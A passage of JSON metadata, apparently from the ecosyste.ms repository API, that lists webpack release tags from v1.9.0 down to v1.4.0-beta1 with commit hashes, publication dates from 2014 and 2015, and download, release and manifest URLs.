k/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p